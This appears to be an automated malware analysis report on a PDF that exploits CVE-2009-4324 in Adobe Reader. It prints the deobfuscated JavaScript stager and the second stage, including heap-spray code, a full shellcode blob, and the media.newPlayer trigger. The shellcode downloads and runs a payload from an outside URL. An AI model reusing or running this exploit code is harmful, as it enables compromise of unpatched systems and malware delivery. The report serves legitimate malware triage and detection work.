Malicious PDF — malware analysis report

Static analysis result for SHA-256 737209fda9189224…

MALICIOUS

PDF

21.3 KB
MD5: 137e6cb96b9b89709feb27b7583be3b7 SHA-1: 1094cbef8a678ffeb41778a97903b5a0e2b71830 SHA-256: 737209fda9189224a315b0a671a74659bd4b523709efb16b35cff9d062cfed4c
150 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF sample contains embedded JavaScript that exploits CVE-2009-4324 for code execution; the accompanying shellcode then downloads a payload from the URL http://xcpz.in/x/p.php?e=8&&. The JavaScript is heavily obfuscated and appears designed to fetch and execute a secondary stage. The ML classifier also strongly indicated maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 6

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://xcpz.in/x/p.php?e=8&& Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0008_000.js
c164107fe12313c105e1a33de8755f1649320e21d29b05e9694f38ad88113e27
pdf-javascript-stream PDF /JS object 8 at offset 0x1E7 2553 bytes
First 1,000 lines of the extracted script
// Literal fragments split with an empty-string concatenation so that "%" and "a"
// never appear as plain string constants; the helper below hands them out for
// indices 2 and 3 of the character table.
var ppp = ""+"%";
var ppp2 = ""+"a";
// Obfuscation helper: returns one single-character building block for the
// API-name table assembled further down, selected by the numeric argument.
//   1 -> app["viewerTy" + app.doc.URL[3] + "e"][1]. The property name only
//        becomes "viewerType" when the 4th character of the document URL is "p"
//        (i.e. the file was opened from an http(s) URL); for a file:// path the
//        lookup yields undefined and the [1] access throws, so this appears to
//        double as an environment check against naive emulation -- confirm.
//        The rest of the script assumes the result is "e" (e.g. viewerType
//        "Reader"), since it is spliced into "eval" and "unescape".
//   2 -> "%"
//   3 -> "a"
// The repeated /*iii9d99999999iii*/ comments look like filler meant to defeat
// byte-pattern signatures; they have no effect on execution.
function sddswww3323232ew(iii9d99999999iii)
{
if(iii9d99999999iii ==1/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/  ""+ /*iii9d99999999iii*/    app["v"+"ie"/*iii9d99999999iii*/+""/*iii9d99999999iii*/+"werTy"+app.doc["U"+""+"RL"][3]+"e"][1] /*iii9d99999999iii*/  );
if(iii9d99999999iii ==2/*iii9d99999999iii*/) return (  /*iii9d99999999iii*/ ""+  /*iii9d99999999iii*/  ppp    /*iii9d99999999iii*/  );
if(iii9d99999999iii ==3/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/  ""+  /*iii9d99999999iii*/      ppp2 /*iii9d99999999iii*/);
}

// Alias for the global object (the Acrobat document scripting context); used
// below to reach eval and unescape via computed property names.
var /*iii9d99999999iii*/gDorKLJmdL77/*iii9d99999999iii*/ = /*iii9d99999999iii*/this/*iii9d99999999iii*/; /*iii9d99999999iii*/

// Character table used to assemble API names without literal strings.
// Resolved values by index: 1:"e" (from the helper, see above), 2:"%", 3:"a",
// 6:"o", 7:"s", 8:"c", 9:"i", 10:"g", 11:"t", 12:"r", 13:"u", 14:"n", 15:"p";
// 0, 4 and 5 are empty padding.
var nFAlxOIQfQ89 =["",sddswww3323232ew(1),sddswww3323232ew(2),sddswww3323232ew(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iii9d99999999iii*/

// Alias for the Acrobat `app` object.
var /*iii9d99999999iii*/gDorKLJmdL77z/*iii9d99999999iii*/ =/*iii9d99999999iii*/ app/*iii9d99999999iii*/; /*iii9d99999999iii*/
var bssfAgFjjK1 = nFAlxOIQfQ89[1];  // "e"
/*iii9d99999999iii*/
var JZIWqLCFzv3 = nFAlxOIQfQ89[2];  // "%"
/*iii9d99999999iii*/
// this["e"+"v"+"a"+"l"] -> eval
var wOdLVDAQeN17 = gDorKLJmdL77[bssfAgFjjK1+"v"+nFAlxOIQfQ89[3]+"l"];
/*iii9d99999999iii*/
// this["u"+"n"+"e"+"s"+"c"+"a"+"p"+"e"] -> unescape
var ItaNzDWVYz18 = gDorKLJmdL77[nFAlxOIQfQ89[13]+nFAlxOIQfQ89[14]+bssfAgFjjK1+"s"+nFAlxOIQfQ89[8]+nFAlxOIQfQ89[3]+nFAlxOIQfQ89[15]+bssfAgFjjK1];
/*iii9d99999999iii*/

// eval("var PMEFdJVUct15 = /hic/ig;") -- defines a global regex for the "hic"
// marker token that separates the encoded payload bytes (cf. the data beginning
// "hic25hic30hic41..." carved later in this artifact).
wOdLVDAQeN17("v"+nFAlxOIQfQ89[3]+"r PMEFdJVUct15 = /hic/"+nFAlxOIQfQ89[9]+nFAlxOIQfQ89[10]+";");
/*iii9d99999999iii*/
// app["d"+"o"+"c"] -> app.doc
var pwPzsjOccq10 = gDorKLJmdL77z[/*iii9d99999999iii*/     "d"+nFAlxOIQfQ89[7-1]+nFAlxOIQfQ89[7+1]];
/*iii9d99999999iii*/
// app.doc.syncAnnotScan()
pwPzsjOccq10[nFAlxOIQfQ89[7]+"yn"+nFAlxOIQfQ89[8]+"A"+nFAlxOIQfQ89[14]+nFAlxOIQfQ89[14]+"o"+nFAlxOIQfQ89[11]+"S"+nFAlxOIQfQ89[8]+nFAlxOIQfQ89[3]+"n"]();
/*iii9d99999999iii*/
// app.doc.getAnnots(0) -> annotations on the first page
var AbntGnZMXI4 = pwPzsjOccq10[nFAlxOIQfQ89[10]+bssfAgFjjK1+"tAnn"+nFAlxOIQfQ89[6]+nFAlxOIQfQ89[11]+nFAlxOIQfQ89[7]](0);
 /*iii9d99999999iii*/
// First annotation's "subject" property: the encoded second stage is carried
// there (presumably the hic-marker blob shown below -- confirm against the PDF
// object tree). Detection cue: a /JS stream reading annotation metadata.
var WEuAvAKhfF5 = AbntGnZMXI4[0][nFAlxOIQfQ89[7]+"ubj"+bssfAgFjjK1+nFAlxOIQfQ89[8]+nFAlxOIQfQ89[11]];
  /*iii9d99999999iii*/
// subject.replace(/hic/ig, "%") -> "hic25hic30hic41" becomes "%25%30%41"
var OoeWKUiNah6 = WEuAvAKhfF5/*iii9d99999999iii*/[nFAlxOIQfQ89/*iii9d99999999iii*/[11+1]+bssfAgFjjK1+/*iii9d99999999iii*/nFAlxOIQfQ89[15]+"l"/*iii9d99999999iii*/+nFAlxOIQfQ89/*iii9d99999999iii*/[3]+nFAlxOIQfQ89/*iii9d99999999iii*/[8]+bssfAgFjjK1]/*iii9d99999999iii*/(PMEFdJVUct15,JZIWqLCFzv3);
/*iii9d99999999iii*/
// unescape(unescape(...)): the first pass turns "%25%30%41" into "%0A", the
// second pass yields the final character -- a two-level percent encoding.
var IaJvUPjtbG7=ItaNzDWVYz18(ItaNzDWVYz18(OoeWKUiNah6));
// eval of the decoded stage (this report carves it as legacy_pdfkit_stage_000.js);
// it defines j, vvv..vvv4 used by the tail below.
wOdLVDAQeN17(IaJvUPjtbG7);

// Tail executed after the eval'd stage: `j`, `util`-method name `vvv2`, and
// `vvv`/`vvv3`/`vvv4` are not defined in this file. In the decoded stage
// (legacy_pdfkit_stage_000.js) j is set only for specific EScript plugin
// versions, vvv2="printd", vvv3="newPlayer", vvv4="media".
if(j){
function run(){util[vvv2](vvv, new Date());}  // util.printd(vvv, new Date()); function declaration inside a block (sloppy mode)
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}  // media.newPlayer(null): the CVE-2009-4324 trigger flagged by the heuristics; errors are swallowed
run();
}
javascript_obj0008_001.js
f64581ee8b353b63416a960dbb2819bb5279e4c45ed430a33b6e1bd29ef848a3
pdf-javascript-stream PDF /JS object 8 at offset 0x209 21251 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
First 1,000 lines of the extracted script
// Literal fragments split with an empty-string concatenation so that "%" and "a"
// never appear as plain string constants; the helper below hands them out for
// indices 2 and 3 of the character table.
var ppp = ""+"%";
var ppp2 = ""+"a";
// Obfuscation helper: returns one single-character building block for the
// API-name table assembled further down, selected by the numeric argument.
//   1 -> app["viewerTy" + app.doc.URL[3] + "e"][1]. The property name only
//        becomes "viewerType" when the 4th character of the document URL is "p"
//        (i.e. the file was opened from an http(s) URL); for a file:// path the
//        lookup yields undefined and the [1] access throws, so this appears to
//        double as an environment check against naive emulation -- confirm.
//        The rest of the script assumes the result is "e" (e.g. viewerType
//        "Reader"), since it is spliced into "eval" and "unescape".
//   2 -> "%"
//   3 -> "a"
// The repeated /*iii9d99999999iii*/ comments look like filler meant to defeat
// byte-pattern signatures; they have no effect on execution.
function sddswww3323232ew(iii9d99999999iii)
{
if(iii9d99999999iii ==1/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/  ""+ /*iii9d99999999iii*/    app["v"+"ie"/*iii9d99999999iii*/+""/*iii9d99999999iii*/+"werTy"+app.doc["U"+""+"RL"][3]+"e"][1] /*iii9d99999999iii*/  );
if(iii9d99999999iii ==2/*iii9d99999999iii*/) return (  /*iii9d99999999iii*/ ""+  /*iii9d99999999iii*/  ppp    /*iii9d99999999iii*/  );
if(iii9d99999999iii ==3/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/  ""+  /*iii9d99999999iii*/      ppp2 /*iii9d99999999iii*/);
}

// Alias for the global object (the Acrobat document scripting context); used
// below to reach eval and unescape via computed property names.
var /*iii9d99999999iii*/gDorKLJmdL77/*iii9d99999999iii*/ = /*iii9d99999999iii*/this/*iii9d99999999iii*/; /*iii9d99999999iii*/

// Character table used to assemble API names without literal strings.
// Resolved values by index: 1:"e" (from the helper, see above), 2:"%", 3:"a",
// 6:"o", 7:"s", 8:"c", 9:"i", 10:"g", 11:"t", 12:"r", 13:"u", 14:"n", 15:"p";
// 0, 4 and 5 are empty padding.
var nFAlxOIQfQ89 =["",sddswww3323232ew(1),sddswww3323232ew(2),sddswww3323232ew(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iii9d99999999iii*/

// Alias for the Acrobat `app` object.
var /*iii9d99999999iii*/gDorKLJmdL77z/*iii9d99999999iii*/ =/*iii9d99999999iii*/ app/*iii9d99999999iii*/; /*iii9d99999999iii*/
var bssfAgFjjK1 = nFAlxOIQfQ89[1];  // "e"
/*iii9d99999999iii*/
var JZIWqLCFzv3 = nFAlxOIQfQ89[2];  // "%"
/*iii9d99999999iii*/
// this["e"+"v"+"a"+"l"] -> eval
var wOdLVDAQeN17 = gDorKLJmdL77[bssfAgFjjK1+"v"+nFAlxOIQfQ89[3]+"l"];
/*iii9d99999999iii*/
// this["u"+"n"+"e"+"s"+"c"+"a"+"p"+"e"] -> unescape
var ItaNzDWVYz18 = gDorKLJmdL77[nFAlxOIQfQ89[13]+nFAlxOIQfQ89[14]+bssfAgFjjK1+"s"+nFAlxOIQfQ89[8]+nFAlxOIQfQ89[3]+nFAlxOIQfQ89[15]+bssfAgFjjK1];
/*iii9d99999999iii*/

// eval("var PMEFdJVUct15 = /hic/ig;") -- defines a global regex for the "hic"
// marker token that separates the encoded payload bytes (cf. the data beginning
// "hic25hic30hic41..." carved later in this artifact).
wOdLVDAQeN17("v"+nFAlxOIQfQ89[3]+"r PMEFdJVUct15 = /hic/"+nFAlxOIQfQ89[9]+nFAlxOIQfQ89[10]+";");
/*iii9d99999999iii*/
// app["d"+"o"+"c"] -> app.doc
var pwPzsjOccq10 = gDorKLJmdL77z[/*iii9d99999999iii*/     "d"+nFAlxOIQfQ89[7-1]+nFAlxOIQfQ89[7+1]];
/*iii9d99999999iii*/
// app.doc.syncAnnotScan()
pwPzsjOccq10[nFAlxOIQfQ89[7]+"yn"+nFAlxOIQfQ89[8]+"A"+nFAlxOIQfQ89[14]+nFAlxOIQfQ89[14]+"o"+nFAlxOIQfQ89[11]+"S"+nFAlxOIQfQ89[8]+nFAlxOIQfQ89[3]+"n"]();
/*iii9d99999999iii*/
// app.doc.getAnnots(0) -> annotations on the first page
var AbntGnZMXI4 = pwPzsjOccq10[nFAlxOIQfQ89[10]+bssfAgFjjK1+"tAnn"+nFAlxOIQfQ89[6]+nFAlxOIQfQ89[11]+nFAlxOIQfQ89[7]](0);
 /*iii9d99999999iii*/
// First annotation's "subject" property: the encoded second stage is carried
// there (presumably the hic-marker blob shown below -- confirm against the PDF
// object tree). Detection cue: a /JS stream reading annotation metadata.
var WEuAvAKhfF5 = AbntGnZMXI4[0][nFAlxOIQfQ89[7]+"ubj"+bssfAgFjjK1+nFAlxOIQfQ89[8]+nFAlxOIQfQ89[11]];
  /*iii9d99999999iii*/
// subject.replace(/hic/ig, "%") -> "hic25hic30hic41" becomes "%25%30%41"
var OoeWKUiNah6 = WEuAvAKhfF5/*iii9d99999999iii*/[nFAlxOIQfQ89/*iii9d99999999iii*/[11+1]+bssfAgFjjK1+/*iii9d99999999iii*/nFAlxOIQfQ89[15]+"l"/*iii9d99999999iii*/+nFAlxOIQfQ89/*iii9d99999999iii*/[3]+nFAlxOIQfQ89/*iii9d99999999iii*/[8]+bssfAgFjjK1]/*iii9d99999999iii*/(PMEFdJVUct15,JZIWqLCFzv3);
/*iii9d99999999iii*/
// unescape(unescape(...)): the first pass turns "%25%30%41" into "%0A", the
// second pass yields the final character -- a two-level percent encoding.
var IaJvUPjtbG7=ItaNzDWVYz18(ItaNzDWVYz18(OoeWKUiNah6));
// eval of the decoded stage (this report carves it as legacy_pdfkit_stage_000.js);
// it defines j, vvv..vvv4 used by the tail below.
wOdLVDAQeN17(IaJvUPjtbG7);

// Tail executed after the eval'd stage: `j`, `util`-method name `vvv2`, and
// `vvv`/`vvv3`/`vvv4` are not defined in this file. In the decoded stage
// (legacy_pdfkit_stage_000.js) j is set only for specific EScript plugin
// versions, vvv2="printd", vvv3="newPlayer", vvv4="media".
if(j){
function run(){util[vvv2](vvv, new Date());}  // util.printd(vvv, new Date()); function declaration inside a block (sloppy mode)
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}  // media.newPlayer(null): the CVE-2009-4324 trigger flagged by the heuristics; errors are swallowed
run();
}
endstream
endobj
7 0 obj
<<
/Length 18390
>>
stream
hic25hic30hic41hic25hic37hic36hic25hic36hic31hic25hic37hic32hic25hic32hic30hic25hic36hic31hic25hic35hic30hic25hic36hic43hic25hic37hic35hic25hic36hic37hic25hic36hic39hic25hic36hic45hic25hic37hic33hic25hic32hic30hic25hic33hic44hic25hic32hic30hic25hic36hic31hic25hic37hic30hic25hic37hic30hic25hic32hic45hic25hic37hic30hic25hic36hic43hic25hic37hic35hic25hic36hic37hic25hic34hic39hic25hic36hic45hic25hic37hic33hic25hic33hic42hic25hic30hic41hic25hic36hic36hic25hic36hic46hic25hic37hic32hic25hic32hic30hic25hic32hic38hic25hic37hic36hic25hic36hic31hic25hic37hic32hic25hic32hic30hic25hic36hic39hic25hic33hic44hic25hic33hic30hic25hic33hic42hic25hic32hic30hic25hic36hic39hic25hic32hic30hic25hic33hic43hic25hic32hic30hic25hic36hic31hic25hic35hic30hic25hic36hic43hic25hic37hic35hic25hic36hic37hic25hic36hic39hic25hic36hic45hic25hic37hic33hic25hic32hic45hic25hic36hic43hic25hic36hic35hic25hic36hic45hic25hic36hic37hic25hic37hic34hic25hic36hic38hic25hic33hic42hic25hic32hic30hic25hic36hic39hic25hic32hic42hic25hic32hic42hic25hic32hic39hic25hic37hic42hic25hic30hic41hic25hic36hic39hic25hic36hic36hic25hic32hic30hic25hic32hic38hic25hic36hic31hic25hic35hic30hic25hic36hic43hic25hic37hic35hic25hic36hic37hic25hic36hic39hic25hic36hic45hic25hic37hic33hic25hic35hic42hic25hic36hic39hic25hic35hic44hic25hic32hic45hic25hic36hic45hic25hic36hic31hic25hic36hic44hic25hic36hic35hic25hic33hic44hic25hic33hic44hic25hic32hic32hic25hic34hic35hic25hic35hic33hic25hic36hic33hic25hic37hic32hic25hic36hic39hic25hic37hic30hic25h
... (truncated)
legacy_pdfkit_stage_000.js
c429c8e7ceb70398649e77a739de65b6f26a3037c3e20334718254c109ecc9bd
deobfuscated-js repeated-marker hex decoded JavaScript at offset 0xC14 1226 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
First 1,000 lines of the extracted script
// Second stage, decoded from the annotation payload and eval'd by the stager
// (javascript_obj0008_*.js). Runs in the same global scope, so the variables it
// defines (j, vvv..vvv4) are picked up by the stager's tail.

// Enumerate Acrobat plug-ins to read the version of "EScript" (the JavaScript
// engine plug-in); `lv` stays undefined if it is not found.
var aPlugins = app.plugIns;
for (var i=0; i < aPlugins.length; i++){
if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
// Version gate: `j` (the loop count used below) is set only for two Reader
// version windows, 9 < v < 9.3 and 8.12 < v < 8.2; any other version leaves j
// undefined so the stager's `if(j)` tail does nothing. Triage cue: the sample
// is tuned to the releases affected by CVE-2009-4324 (see heuristics above).
if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{}
s=new Array();  // implicit global (no var)
// %u-escaped (UTF-16 little-endian) shellcode blob. Decoding the %uXXXX pairs
// exposes the strings an analyst can use as IoCs: "urlmon.dll", a drop path
// "C:\U.exe", and at the tail the download URL http://xcpz.in/x/p.php?e=8&&
// (heuristic PDF_JS_SHELLCODE_DOWNLOAD_URL).
var sh = "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u782F%u7063%u2E7A%u6E69%u782F%u702F%u702E%u7068%u653F%u383D%u2626%u9000";
var str="%u9090%u9090";  // 0x9090 filler unit, doubled below
sh=unescape(sh);str=unescape(str);
// Grow the filler to just over 0x8000 UTF-16 units, trim it so filler+shellcode
// is exactly 0x8000, then store `j` copies in the otherwise-unused array `s`.
// The repeated "%u9090" + string-doubling loop is itself a well-known
// detection signature for this kind of memory-preparation code.
while(str.length <= 0x8000) {str+=str;}
str=str.substr(0,0x8000 - sh.length);
for(i=0;i<j;i++) {s[i]=str + sh;}
// Names consumed by the stager's tail: util.printd(vvv, new Date()) and
// media.newPlayer(null) (CVE-2009-4324).
var vvv = "p@111111111111111111111111 : yyyy111";
var vvv2 = "printd";
var vvv3 = "newPlayer";
var vvv4 = "media";
legacy_pdfkit_stage_001.js
42025b552c7960b53abcd8cd732b01c8d109eccfdfefc352b9826c4d5807d414
deobfuscated-js cross-stage annotation API aliases at offset 0x1E7 81 bytes
First 1,000 lines of the extracted script
// Analyst-synthesized view of the stager's `this[vvv4][vvv3](null)` call with
// the aliases resolved (vvv4="media", vvv3="newPlayer" from the decoded stage);
// this is the CVE-2009-4324 trigger the heuristics flag.
media.newPlayer(null); /* alias values recovered from decoded annotation stage */